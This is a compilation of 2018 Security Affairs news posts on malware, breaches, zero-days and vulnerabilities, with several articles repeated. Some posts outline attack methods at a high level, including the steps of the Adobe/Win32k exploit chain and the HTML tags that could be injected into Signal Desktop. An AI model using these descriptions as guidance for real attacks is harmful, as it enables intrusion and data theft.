The experts successfully demonstrated three different cache bypasses for Nethammer technique:

  • A kernel driver that flushes (and reloads) an address whenever a packet is received.
  • Intel Xeon CPUs with Intel CAT for fast cache eviction
  • Uncached memory on an ARM-based mobile device.

The experts observed a bit flip every 350 ms demonstrating that it is possible to hammer over the network if at least two memory accesses are served from main memory, they successfully induced the interference by sending a stream of UDP packets with up to 500 Mbit/s to the target system.

The Nethammer attack technique does not require any attack code differently from the original Rowhammer attack.

Unfortunately, any attack technique based on the Rowhammer attack is not possible to mitigate with software patched, to solve the issues, it is necessary to re-design the architecture of the flawed components, meantime threat actors can start exploiting the Rowhammer technique in the wild.

Further details on the Rowhammer attack are reported in my post titled “The Rowhammer: the Evolution of a Dangerous Attack

Pierluigi Paganini

(Security Affairs – Nethammer, hacking)

The post Nethammer – Exploiting Rowhammer attack through network without a single attacker-controlled line of code appeared first on Security Affairs.

Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files

Cisco Talos researchers have spotted a new variant of Telegrab malware designed to collect information from the Desktop version of the popular messaging service Telegram.

Security experts from Cisco Talos group have spotted a new strain of malware that is targeting the desktop version of end-to-end encrypted instant messaging service Telegram.

We all know that Telegram is under attack by Russia’s Media watchdog Roskomnadzor that asked the company to share technical details to access electronic messages shared through the instant messaging app. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over encryption keys of its users to Federal Security Service (FSB) of Russia for investigation purposes.

Now the analysis of the malware revealed it was developed by a Russian-speaking attacker “with high confidence,” the threat actor is mostly targeting Russian-speaking victims.

The malicious code is a variant of the Telegrab malware that was first spotted in the wild on 4 April 2018, it has been designed to harvest cache and key files from Telegram application.

A  second variant of the Telegrab malware emerged on 10 April 2018, the development team appears very active.

While the first variant of the Telegrab malware only stole text files, browser credentials, and cookies, the second version also implements the ability to collect data from Telegram’s desktop cache and Steam login credentials to hijack active Telegram sessions.

Talos researchers discovered that the malicious code is intentionally avoiding IP addresses related to anonymizer services.

“Over the past month and a half, Talos has seen the emergence of a malware that collects cache and key files from end-to-end encrypted instant messaging service Telegram. This malware was first seen on April 4, 2018, with a second variant emerging on April 10.” reads the blog post published by Cisco Talos.

The researchers identified the author behind this malware with high confidence, he posted several YouTube videos tutorial for the Telegrab malware.
The operators of this malware use several pcloud.com hardcoded accounts to store the exfiltrated data, the experts noticed that stolen info is not encrypted allowing anyone with access to these account credentials to access the exfiltrated data.

“Telegram session hijacking is the most interesting feature of this malware, even with limitations this attack does allow the session hijacking and with it, the victims’ contacts and previous chats are compromised,” says the Talos team.

The malicious code searches the hard drives on Windows targets for Chrome credentials, session cookies, and text files, which get zipped and uploaded to pcloud.com.

Cisco Talos researchers blame “weak default settings” on the Telegram Desktop version, the Telegrab malware, in fact, abuses the lack of Secret Chats that are not implemented on the desktop version of the popular application.

Cisco Talos experts explained that the Telegrab malware works “by restoring cache and map files into an existing Telegram desktop installation if the session was open.

“In summary, by restoring cache and map files into an existing Telegram desktop installation, if the session was open. It will be possible to access the victim’s session, contacts and previous chats.” continues the post. 

Telegrab Malware

The analysis of the malware allowed the researchers to link it to a user that goes online by the name of Racoon Hacker, also known as Eyenot (Енот / Enot) and Racoon Pogoromist (sic).

The Telegram malware aimed at a surgical operation that can fly under the radar and compromise thousands of credentials in a few time.

Such kind of operations is usually not associated with cybercrime gangs that operate on a larger scale. Stolen credentials and cookies allow the malware operator to access the victim’s information on social media and email services (i.e. vk.com, yandex.com, gmail.com, google.com etc.) that are precious source of information for intelligence gathering.

“This malware should be considered a wakeup call to encrypted messaging systems users. Features which are not clearly explained and bad defaults can put in jeopardy their privacy.” concludes Talos experts.

“When compared with the large bot networks used by large criminal enterprises, this threat can be considered almost insignificant.” 

“The malware samples analysed are not particularly sophisticated but they are efficient. There are no persistence mechanisms, meaning victims execute the malware every time, but not after reboots”.

Pierluigi Paganini

(Security Affairs – Telegrab malware, Telegram)

The post Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files appeared first on Security Affairs.

Security Affairs: Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files

Cisco Talos researchers have spotted a new variant of Telegrab malware designed to collect information from the Desktop version of the popular messaging service Telegram.

Security experts from Cisco Talos group have spotted a new strain of malware that is targeting the desktop version of end-to-end encrypted instant messaging service Telegram.

We all know that Telegram is under attack by Russia’s Media watchdog Roskomnadzor that asked the company to share technical details to access electronic messages shared through the instant messaging app. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over encryption keys of its users to Federal Security Service (FSB) of Russia for investigation purposes.

Now the analysis of the malware revealed it was developed by a Russian-speaking attacker “with high confidence,” the threat actor is mostly targeting Russian-speaking victims.

The malicious code is a variant of the Telegrab malware that was first spotted in the wild on 4 April 2018, it has been designed to harvest cache and key files from Telegram application.

A  second variant of the Telegrab malware emerged on 10 April 2018, the development team appears very active.

While the first variant of the Telegrab malware only stole text files, browser credentials, and cookies, the second version also implements the ability to collect data from Telegram’s desktop cache and Steam login credentials to hijack active Telegram sessions.

Talos researchers discovered that the malicious code is intentionally avoiding IP addresses related to anonymizer services.

“Over the past month and a half, Talos has seen the emergence of a malware that collects cache and key files from end-to-end encrypted instant messaging service Telegram. This malware was first seen on April 4, 2018, with a second variant emerging on April 10.” reads the blog post published by Cisco Talos.

The researchers identified the author behind this malware with high confidence, he posted several YouTube videos tutorial for the Telegrab malware.
The operators of this malware use several pcloud.com hardcoded accounts to store the exfiltrated data, the experts noticed that stolen info is not encrypted allowing anyone with access to these account credentials to access the exfiltrated data.

“Telegram session hijacking is the most interesting feature of this malware, even with limitations this attack does allow the session hijacking and with it, the victims’ contacts and previous chats are compromised,” says the Talos team.

The malicious code searches the hard drives on Windows targets for Chrome credentials, session cookies, and text files, which get zipped and uploaded to pcloud.com.

Cisco Talos researchers blame “weak default settings” on the Telegram Desktop version, the Telegrab malware, in fact, abuses the lack of Secret Chats that are not implemented on the desktop version of the popular application.

Cisco Talos experts explained that the Telegrab malware works “by restoring cache and map files into an existing Telegram desktop installation if the session was open.

“In summary, by restoring cache and map files into an existing Telegram desktop installation, if the session was open. It will be possible to access the victim’s session, contacts and previous chats.” continues the post. 

Telegrab Malware

The analysis of the malware allowed the researchers to link it to a user that goes online by the name of Racoon Hacker, also known as Eyenot (Енот / Enot) and Racoon Pogoromist (sic).

The Telegram malware aimed at a surgical operation that can fly under the radar and compromise thousands of credentials in a few time.

Such kind of operations is usually not associated with cybercrime gangs that operate on a larger scale. Stolen credentials and cookies allow the malware operator to access the victim’s information on social media and email services (i.e. vk.com, yandex.com, gmail.com, google.com etc.) that are precious source of information for intelligence gathering.

“This malware should be considered a wakeup call to encrypted messaging systems users. Features which are not clearly explained and bad defaults can put in jeopardy their privacy.” concludes Talos experts.

“When compared with the large bot networks used by large criminal enterprises, this threat can be considered almost insignificant.” 

“The malware samples analysed are not particularly sophisticated but they are efficient. There are no persistence mechanisms, meaning victims execute the malware every time, but not after reboots”.

Pierluigi Paganini

(Security Affairs – Telegrab malware, Telegram)

The post Russian Telegrab malware harvesting Telegram Desktop credentials, cookies, desktop cache, and key files appeared first on Security Affairs.



Security Affairs

Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks

The head of the Mexican central bank, Alejandro Diaz de Leon announced this week that hackers were involved in shadowy transfers of between $18 million and $20 million.

Mexican central bank is the last victim of the SWIFT hackers, officials at the bank confirmed this week that hackers hit the payments system and stole millions of dollars from domestic banks.

The attack was discovered in late April and presents many similarities with past attacks against the SWIFT systems.

The Mexican central bank did not disclose the name of the banks that were hit by the cyber attack and did not detail the overall amount of money that crooks have stolen.

According to Alejandro Diaz de Leon, head of Mexico’s central bank, crooks were able to complete illicit transactions of $18 million to $20 million.

“Central bank Governor Alejandro Diaz de Leon said on Monday that the country had seen an unprecedented attack on payment system connections and that he hoped that measures being taken would stop future incidents.” reported the Reuters.

“A source close to the government’s investigation said more than 300 million had been siphoned out of banks, but it was not clear how much had subsequently been taken out in cash withdrawals.”

Mexican central bank cyberheist

According to reports, Mexico’s central following the latest cyber attacks has created a cybersecurity division, and it has instituted a one-day waiting period on electronic funds transfers of more than $2,500.

“Perhaps, some financial institutions perceived the attacks in Bangladesh as something very distant,” said Alejandro Diaz de Leon who believes that some Mexican banks may not have invested in sufficient security measures.

“But criminals look for vulnerability and once they see it they are going to exploit it.”

Mexican depositors won’t be affected, but the overall losses for the local banks could be greater than initially thought.

Pierluigi Paganini

(Security Affairs – Mexican central bank, SWIFT)

The post Mexican central bank confirmed that SWIFT hackers stole millions of dollars from Mexican Banks appeared first on Security Affairs.

Operation Hotel – Ecuador spent millions on spy operation for Julian Assange

According to The Guardian newspaper, Ecuador spent millions on spy operation for Julian Assange after he hacked the embassy network.

According to a report published by the Guardian, Ecuador spied on WikiLeaks founder Julian Assange at its London embassy where he took in political asylum since 2012,

In 2012 a British judge ruled he should be extradited to Sweden to face allegations of sexual assault there, but Assange explained that they were political accusations.

“Ecuador bankrolled a multimillion-dollar spy operation to protect and support Julian Assange in its central London embassy, employing an international security company and undercover agents to monitor his visitors, embassy staff and even the British police, according to documents seen by the Guardian.” reads the report published by The Guardian.

“Over more than five years, Ecuador put at least $5m (£3.7m) into a secret intelligence budget that protected the WikiLeaks founder while he had visits from Nigel Farage, members of European nationalist groups and individuals linked to the Kremlin.”

The newspaper revealed Equador spent $5.0 million on the operation codenamed “Operation Guest” and later “Operation Hotel” that was approved by the then Ecuadorian president, Rafael Correa, and the then foreign minister, Ricardo Patiño.

Initially, the operation aimed at the Assange’s protection, but later became a spying operation on the journalist. From June 2012 to the end of August 2013, Operation Hotel cost Ecuador $972,889, according to documents belonging to the Senain, the Ecuadorian intelligence agency.

The experts hired by Equador monitored Assange’s daily activities and any contact with external staff and visitors, the stayed in a rented flat near the embassy at a cost of £2,800 a month.

Julian Assange

“Documents show the intelligence programme, called “Operation Guest”, which later became known as “Operation Hotel” – coupled with parallel covert actions – ran up an average cost of at least $66,000 a month for security, intelligence gathering and counter-intelligence to “protect” one of the world’s most high-profile fugitives.” continues the newspaper. the paper said.

According to The Guardian, that cited documents it has vieved, Assange hacked the communications system within the embassy gaining access to staff communications.

“In an extraordinary breach of diplomatic protocol, Assange managed to compromise the communications system within the embassy and had his own satellite internet access, according to documents and a source who wished to remain anonymous.” continues the paper

“By penetrating the embassy’s firewall, Assange was able to access and intercept the official and personal communications of staff,”

Wikileaks denied Assange had hacked the embassy network.

In response, Ecuador has forbidden internet access for Assange in recent months with the installation of a jammer, the Government as also restricted the number of visitors he can receive.

“Assange claims the accusations were politically motivated and could lead to him being extradited to the United States to face imprisonment over WikiLeaks’ publication of secret US military documents and diplomatic cables in 2010.” reported the AFP agency.

“Ecuador in December made Assange an Ecuadoran citizen and unsuccessfully tried to register him as a diplomat with immunity as part of its efforts to have him leave the embassy without risk of being detained.”

Last year, Sweden dropped its investigation on Assange, but the British authorities still plan to arrest him for breaching his bail conditions.

Pierluigi Paganini

(Security Affairs – Julian Assange, hacking)

The post Operation Hotel – Ecuador spent millions on spy operation for Julian Assange appeared first on Security Affairs.

Security Affairs: Mysterious hackers ingenuously reveal two Zero-Days to security community

Mysterious hackers ingenuously reveal two zero-days to the security community, experts collaborated to promptly fix them.

Anton Cherepanov, security expert form ESET researcher, discovered two zero-days while analyzing a malicious PDF, according to the researcher the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (Two suspicious PDF samples zero-day 1zero-day 2), the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote-code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape the Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below the steps composing the attack chain:

  • The victim receives and opens a weaponized PDF file
  • Once the user opened the PDF, a malicious JavaScript code will execute.
  • JavaScript code manipulates a button object
  • The Button object contains a specially-crafted JPEG2000 image, triggers a double-free vulnerability in Adobe Acrobat/Reader.
  • JavaScript code uses heap-spray techniques to obtain read and write memory access
  • JavaScript code then interacts with Adobe Reader’s JavaScript engine
  • The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute its own native shellcode.
  • Shellcode initializes a PE file embedded in the PDF
  • Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

Even if the chain of the zero-days could be very dangerous, the developers allowed the security community to detect them by uploading it to a known virus scanning engine aiming to test its evasion capability.

zero-days exploits

The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Pierluigi Paganini

(Security Affairs – zero-days, hacking)

The post Mysterious hackers ingenuously reveal two Zero-Days to security community appeared first on Security Affairs.



Security Affairs

Mysterious hackers ingenuously reveal two Zero-Days to security community

Mysterious hackers ingenuously reveal two zero-days to the security community, experts collaborated to promptly fix them.

Anton Cherepanov, security expert form ESET researcher, discovered two zero-days while analyzing a malicious PDF, according to the researcher the mysterious hacker(s) were still working on the exploits.

The malicious PDF was discovered late in March 2018 (Two suspicious PDF samples zero-day 1zero-day 2), the analysis of the document revealed it was exploiting two previously unknown vulnerabilities, a remote-code execution vulnerability in Adobe Reader and a Windows privilege escalation flaw.

“The use of the combined vulnerabilities is extremely powerful, as it allows an attacker to execute arbitrary code with the highest possible privileges on the vulnerable target, and with only the most minimal of user interaction. APT groups regularly use such combinations to perform their attacks, such as in the Sednit campaign from last year.” reads the analysis published by ESET.

“The sample does not contain a final payload, which may suggest that it was caught during its early development stages,” Cherepanov said.

ESET shared its discovery with the Microsoft Security Response Center, Windows Defender ATP research team, and Adobe Product Security Incident Response Team as they fixed these bugs.

The two zero-days were tracked as CVE-2018-4990, that affected Adobe Acrobat/Reader PDF viewer, and as CVE-2018-8120 that affected the Win32k component of Windows.

By chaining the two vulnerabilities it was possible to escape the Adobe’s sandbox protection and execute arbitrary code inside Adobe Acrobat/Reader.

“The malicious PDF sample embeds JavaScript code that controls the whole exploitation process. Once the PDF file is opened, the JavaScript code is executed,” states the report published by ESET.

Below the steps composing the attack chain:

  • The victim receives and opens a weaponized PDF file
  • Once the user opened the PDF, a malicious JavaScript code will execute.
  • JavaScript code manipulates a button object
  • The Button object contains a specially-crafted JPEG2000 image, triggers a double-free vulnerability in Adobe Acrobat/Reader.
  • JavaScript code uses heap-spray techniques to obtain read and write memory access
  • JavaScript code then interacts with Adobe Reader’s JavaScript engine
  • The attacker uses the engine’s native assembly instructions (ROP gadgets) to execute its own native shellcode.
  • Shellcode initializes a PE file embedded in the PDF
  • Once the attacker has exploited the Adobe Reader vulnerability, he will leverage the Window zero-day flaw to escape the sandbox. The Microsoft Win32k zero-day allows the attacker to elevate the privilege of the PE file to run, which is run in kernel mode, escaping the Adobe Acrobat/Reader sandbox and gaining system-level access.

Even if the chain of the zero-days could be very dangerous, the developers allowed the security community to detect them by uploading it to a known virus scanning engine aiming to test its evasion capability.

zero-days exploits

The two zero-days have been already patched, Microsoft addressed the CVE-2018-8120 with the release of the May 2018 Patch Tuesday, Adobe patched the CVE-2018-4990 this week.
“Initially, ESET researchers discovered the PDF sample when it was uploaded to a public repository of malicious samples. The sample does not contain a final payload, which may suggest that it was caught during its early development stages.” concludes the report.
“Even though the sample does not contain a real malicious final payload, which may suggest that it was caught during its early development stages, the author(s) demonstrated a high level of skills in vulnerability discovery and exploit writing.”

Pierluigi Paganini

(Security Affairs – zero-days, hacking)

The post Mysterious hackers ingenuously reveal two Zero-Days to security community appeared first on Security Affairs.

Red Hat Linux DHCP Client affected by a command injection flaw, patch it now!

Red Hat has announced a critical vulnerability in its DHCP client tracked as CVE-2018-1111 that could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

Felix Wilhelm from the Google security team discovered a critical remote command injection vulnerability in the DHCP client implementation of Red Hat Linux, the issue also affects other distros based on it like Fedora.

The vulnerability, tracked as CVE-2018-1111, could be exploited by attackers to execute arbitrary commands with root privileges on targeted systems.

“Red Hat has been made aware of a command injection flaw found in a script included in the DHCP client (dhclient) packages in Red Hat Enterprise Linux 6 and 7.” reads the security advisory published by Red Hat.

“A malicious DHCP server, or an attacker on the local network able to spoof DHCP responses, could use this flaw to execute arbitrary commands with root privileges on systems using NetworkManager which is configured to obtain network configuration using the DHCP protocol.”

The DHCP client application receives network configuration parameters, including IP address and DNS servers, from the DHCP (Dynamic Host Control Protocol) server.

The CVE-2018-1111 command injection flaw resides in the NetworkManager integration script of the DHCP client packages in Red Hat Enterprise Linux.

The researcher Barkın Kılıç published a PoC for the CVE-2018-1111, in the last screenshot the attacker accesses the shell as root.

Red Hat DHCP client flaw

Wilhelm did not release a PoC exploit code, but he explained that is so short in length that it even can fit in a tweet.

According to Wilhelm, an attacker using a malicious DHCP server, or connected to the same network as the victim, can exploit this vulnerability by spoofing DHCP responses, eventually allowing them to run arbitrary commands with root privileges on the victim’s system running vulnerable DHCP client.

The vulnerability affects Red Hat Enterprise Linux 6 and 7, admins should update their packages to the newer versions as soon as they are available.

“Users have the option to remove or disable the vulnerable script, but this will prevent certain configuration parameters provided by the DHCP server from being configured on a local system, such as addresses of the local NTP or NIS servers,” Red Hat warns.

Below the full list of affected RHEL versions:

Advanced Update Support 6.4; Extended Update Support 7.3; Advanced Update Support 6.6; Red Hat Enterprise Linux 6; Extended Update Support 6.7; Advanced Update Support 7.2; Server TUS (v.6.6); RHEL 7; Extended Update Support 7.4; Virtualization 4 Management Agent for RHEL 7 Hosts; Advanced Update Support 6.5; and Linux Server TUS (v. 7.2).

Red Hat’s update services for SAP Solutions on x86 and IBM Power architectures are also affected.

Fedora has already released new versions of DHCP packages containing fixes for Fedora 26, 27, and 28.

Other Linux distros like OpenSUSE and Ubuntu are not affected by the vulnerability because their DHCP client implementation doesn’t include NetworkManager integration script by default.

Pierluigi Paganini

(Security Affairs – CVE-2018-1111, DHCP Client flaw)

The post Red Hat Linux DHCP Client affected by a command injection flaw, patch it now! appeared first on Security Affairs.

Anonymous defaced Russia govt website against Telegram ban

Anonymous collective hacked and defaced the subdomain of the Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo) site to protest against the government censorship, with a specific reference to the ban on Telegram.

Anonymous hacked the official website of Russia’s Federal Agency for International Cooperation (Rossotrudnichestvo), the cyber attack occurred on May 10th (Rossotrudnichestvo). The popular collective hacked and defaced the subdomain of the site to protest against the government censorship, with a specific reference to the ban on Telegram. Last month, the Russian authorities blocked the Telegram app in the country because the company refused to hand over encryption keys of its users to Federal Security Service (FSB) of Russia for investigation purposes.

“The website of a government agency tasked with promoting Russia’s image abroad has been hijacked by hackers who posted a message with a threat against the state body involved in a campaign to block a popular messaging app.” reads The Moscow Times.

Since May 3rd, 2018, Russia’s media and communication regularity authority Roskomnadzor blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

Anonymous defaced one of the subdomains of Rossotrudnichestvo, the hackers published the NSFW image and several messages against the ongoing government censorship.

“Greetings, Roskomnadzor. Your recent destructive actions against Runet led us to the idea that you are just a handful of incompetent brainless worms. You no longer have to be able to continue this pointless vandalism. Consider this as our last warning. Yours, Anonymous.” reads the message published on the defaced domain.

“That defacement was accompanied by the image of a cartoon character wearing a Roskomnadzor arm patch using a flamethrower on the “internet,” as well as a symbol of Telegram founder Pavel Durov’s “Digital Resistance” which he declared against political censorship.” continues the media outlet.

Currently, the Rossotrudnichestvo website is up and active, while the defaced subdomain prev.rs.gov.ru was offline.

Pierluigi Paganini

(Security Affairs – Rossotrudnichestvo, Anonymous)

The post Anonymous defaced Russia govt website against Telegram ban appeared first on Security Affairs.

Rail Europe North America hit by payment card data breach

Rail Europe North America (RENA) notifies customers of a security breach, crooks compromised its website with a malware used to siphon payment card data.

The website allows users to buy European train tickets, according to the company the data breach lasted at least three months (between November 29, 2017 and February 16, 2018), the incident exposed also customers’ payment card data.

“Rail Europe North America Inc. (“RENA” or “we”) is writing to let you, as a customer of RENA, know about a recent data security incident that may have involved your credit card or debit card information and other personal information” reads the notice sent by the company to its customers.

“On February 16, 2018, as a result of a query from one of our banks, we discovered that beginning on November 29, 2017, through February 16, 2018, unauthorized persons gained unauthorized access to our ecommerce websites’ IT platform. Upon discovery that this malicious intrusion may have compromised users’ personal information, we immediately cut off from the Internet all compromised servers on February 16, 2018, and engaged information security experts to assist with forensic analysis, system restoration and security hardening”

According to the notice of data breach, hackers accessed registered users’ personal information including name, gender, delivery address, invoicing address, telephone number, email address, credit/debit card number, expiration date and CVV of customers, and, in some cases, username and password.

Rail Europe North America hack

The security breach was discovered after a bank inquiry informed the organization of an attack.

“In this case, however, the hackers were able to affect the front end of the Rail Europe website with ‘skimming’ malware, meaning customers gave payment and other information directly to the hackers through the website,” said Comparitech privacy advocate Paul Bischoff. “While the details haven’t been fully disclosed, the fact that this went on for three months shows a clear lack of security by Rail Europe.”

RENA replaced and rebuilt all compromised systems from known safe code, it also removed any potentially untrusted components. The IT staff changed passwords on all systems and applications, improved security controls and renewed digital certificates.

“RENA has also provided notice to the credit card brands and our credit/debit card transaction processors.” continues the notice.
“In addition, we are offering identity theft protection services through ID Experts®, the data breach and recovery services expert, to provide you with MyIDCare™. MyIDCare services include: 12 months of Credit and CyberScan monitoring, a $1,000,000 insurance reimbursement policy, exclusive educational materials and fully managed id theft recovery services.”

Pierluigi Paganini

(Security Affairs – Rail Europe North America, data breach)

The post Rail Europe North America hit by payment card data breach appeared first on Security Affairs.

Dutch Government plans to phase out the use of Kaspersky solutions

Dutch Government plans to phase out the use of Kaspersky solutions while the security firm confirmed that its code infrastructure is going to move to Switzerland.

The antivirus firm Kaspersky Lab made the headlines again, the company confirmed that its code infrastructure is going to move to Switzerland. The news arrives just after the comment from the Netherlands government of the risks associated with the usage of Kaspersky Lab software.

Dutch government announced on Monday it plans to phase out the use of anti-virus software developed by Kaspersky Labs “as a precautionary measure” and recommending companies involved in the protection of critical infrastructure to do the same.

Dutch Government fear the aggressive Russian cyber strategy cyber that targets among others the country interests.

“In a letter to parliament, Justice Minister Ferdinand Grapperhaus said the decision was made because the Russian government had an “offensive cyber programme that targets among others the Netherlands and Dutch interests”.” reported The New York Times.

“He also said Moscow-based Kaspersky was subject to Russian laws that could oblige it to comply with Russian state interests.”

In response to the accusations from several governments, Kaspersky is moving a number of its core activities from Russia to Switzerland as part of its “Global Transparency Initiative.” It has been estimated that the overall costs of the transfer are $12m.

“The (Dutch) cabinet has carried out an independent review and analysis and made a careful decision on that basis,” Grapperhaus said. “Although there are no concrete cases of misuse known in the Netherlands, it cannot be excluded.”

Grapperhaus explained the Dutch government would consider revising the decision “if circumstances justify” doing so.

The U.S. DHS ban on the use of Kaspersky software by the U.S. Federal government in 2017, while Kaspersky continues to deny any cooperation with Russian intelligence,

Britain’s National Cyber Security Centre for agencies and organizations also suggests avoiding the usage of Kaspersky solutions for the protection of systems that manage classified information.

In December, Lithuania announced it will ban the products of the cybersecurity giant Kaspersky from computers in critical infrastructure.

In April, Twitter banned Kaspersky from advertising on its platform citing DHS ban for its alleged ties with Russian intelligence agencies.

Pierluigi Paganini

(Security Affairs – Kaspersky, Dutch Government)

The post Dutch Government plans to phase out the use of Kaspersky solutions appeared first on Security Affairs.

Hackers shared technical details of a Code Injection flaw in Signal App

Researchers shared details of a code injection vulnerability they found in the in the Signal app for both Windows and Linux systems. The flaw was promptly fixed by Signal.

Signal has fixed a code injection vulnerability in the app for both Windows and Linux systems that was reported by a team of Argentinian experts.

A remote attacker could have exploited the flaw to inject a malicious code inside the Signal desktop app running on the recipients’ system without requiring any user interaction, just by sending the victims a specially crafted link.

The discovery of the flaw was casual, the white-hat hackers Iván Ariel Barrera Oro, Alfredo Ortega and Juliano Rizzo were chatting on Signal messenger when one of them shared a link of an XSS vulnerable Argentinian government website.

The experts noticed that the XSS payload was executed on the recipients’ Signal desktop app.

“we were chatting as usual and suddenly Alfredo shows us an XSS in an Argentinian government site (don’t worry, it’s been reported). He was using the Signal add-on for Chrome. Javier and I were using the desktop version, based on the insecure electron framework. As I was reading, something caught my attention: an icon was showing next to the URL, as a “picture not found” icon.” reads a blog post published by the experts.

Signal XSS flaw

“I jumped from my chair and warned: “your XSS is triggered in signal-desktop!!”.”

Signal xss flaw 2

The researchers focused their attention on XSS flaws in the Signal Messaging App and conducted other tests discovering that the vulnerabilities was affecting the function responsible for handling shared links.

The experts discovered that it is possible to exploit the flaw to inject user-defined HTML/JavaScript code via iFrame, image, video and audio tags.

“We tried different kinds of HTML elements: img, form, script, object, frame, framset, iframe, sound, video (this last two where funny).”  continues the experts. “They all worked, except that CSP blocked the execution of scripts, which halted in some way this attack. However, to abuse this vuln, we could:

  • crash the app with repeated and specially crafted URLs, obtaining segmentation fault/DoS (Alfredo’s app crashed several times but mine didn’t, so we couldn’t reproduce it)
  • send a crafted image in base64 format (we didn’t carry on with this)
  • send a file/phish and execute it with <iframe src=”…”></iframe>
  • have fun with <img>, <audio> and <video> 🙂
The attackers can also exploit the vulnerability to inject a form on the recipient’s chat window, tricking them to provide sensitive information via social engineering attacks.

The experts applauded the Signal security team that on Friday in under 2 hours from the report has fixed the issue.

Experts explained that the flaw did not allow attackers to execute system commands or gain sensitive information like decryption keys on the recipients’ system.

After Signal fixed the issue, the researcher analyzed the file’s history and discovered the patch leverages a regex function to validate URLs.
The applied “patch” already existed in the application, but was probably accidentally removed in a commit on April 10th to fix an issue with linking.
The experts are concerned about that regex and they are afraid someone might exploit it.

The Signal app continues to be the most secure choice for encrypted communication.

Pierluigi Paganini

(Security Affairs – Signal, hacking)

The post Hackers shared technical details of a Code Injection flaw in Signal App appeared first on Security Affairs.

Massive DDoS attack hit the Danish state rail operator DSB

The Danish state rail operator DSB was hit by a massive DDoS cyber attack that paralyzed some operations, including ticketing systems and the communication infrastructure.

The Danish state rail operator DSB was hit by an unprecedented DDoS cyber attack, the attack was confirmed on Monday by the company and reported by The Local media outlet.

The attack was launched on Sunday and paralyzed the ticketing system and prevented passengers across the country from buying tickets.

“Tickets purchases via the company’s app, ticket machines, website and in 7-Eleven stores were all out of action due to the issue on Sunday.” reported The Local.

“Passengers with Rejsekort travel cards were able to use that system, while others purchased tickets from ticket inspectors on board trains.”

The state rail operator DSB restored normal operations on Monday morning

The company experts confirmed the attack from an external source with the specific intent to destroy the operations at the state rail operator DSB. The hackers took offline also internal mail system and the telephone infrastructure. The only way to communicate with the customers was represented by social media.

The train safety was not compromised by hackers, assured the deputy director.

“Our technicians and IT contractors have analysed this closely during the night and have concluded this is an outside attack in which someone has attempted to bring our system down,” DSB vice-director Aske Wieth-Knudsen said.

Danish state rail operator DSB

“”We have previously been subjected to an attack and, of course, we have made some processes to avoid this. The type of attack we saw yesterday is a new way of doing it, as we have not seen before. So it needs to be analyzed a bit closer, exactly what has happened so we can prevent it from repeating, says Aske Wieth-Knudsen.Wieth-Knudsen told DR.

The company is investigating the issue along with Danish authorities and are monitoring the situation to prevent further attacks.

“At this moment in time I have not yet been in contact with anyone. We are still clarifying some messages, since the attack was only resolved during the night,” he told Ritzau.

“Now the day has started we will naturally contact relevant bodies,” he added.

Aske Wieth-Knudsen from DSB confirmed that the company has not been paid any kind of ransom in connection with the cyber assault.

Pierluigi Paganini

(Security Affairs – state rail operator DSB, DDoS)

The post Massive DDoS attack hit the Danish state rail operator DSB appeared first on Security Affairs.

Adobe issued security updates for 47 vulnerabilities in Acrobat DC and Reader

On Monday, Adobe issued security updates for 47 vulnerabilities in the Windows and macOS versions of Acrobat DC (Consumer and Classic 2015), Acrobat Reader DC (Consumer and Classic 2015), Acrobat 2017, and Acrobat Reader 2017.

Many vulnerabilities are ranked as critical and could be exploited for arbitrary code execution.

“Adobe has released security updates for Adobe Acrobat and Reader for Windows and MacOS. These updates address critical vulnerabilities whose successful exploitation could lead to arbitrary code execution in the context of the current user.” reads the security advisory published by Adobe.

Many of the security vulnerabilities were reported to Adobe through Trend Micro’s Zero Day Initiative (ZDI).

Adobe addressed the vulnerabilities with the release of versions 2018.011.20040, 2017.011.30080 and 2015.006.30418.

The vulnerabilities include 24 critical memory corruptions that could be exploited to execute arbitrary in the context of the targeted user and many other issues  such as Security Bypass and NTLM SSO hash theft ranked as “important.”

Adobe has credited independent researchers and experts from Cisco Talos, Check Point, Palo Alto Networks, Tencent, Knownsec 404 Security Team, ESET, Kaspersky, Cybellum, and Cure53 for the vulnerabilities in Acrobat and Reader releases.

Adobe announced the end of support for Acrobat and Reader 11.x on October 15, 2017, and that version 11.0.23 is the final release for these products.

Adobe has also released security updates to fix a flaw in the Windows and macOS versions of Photoshop CC.

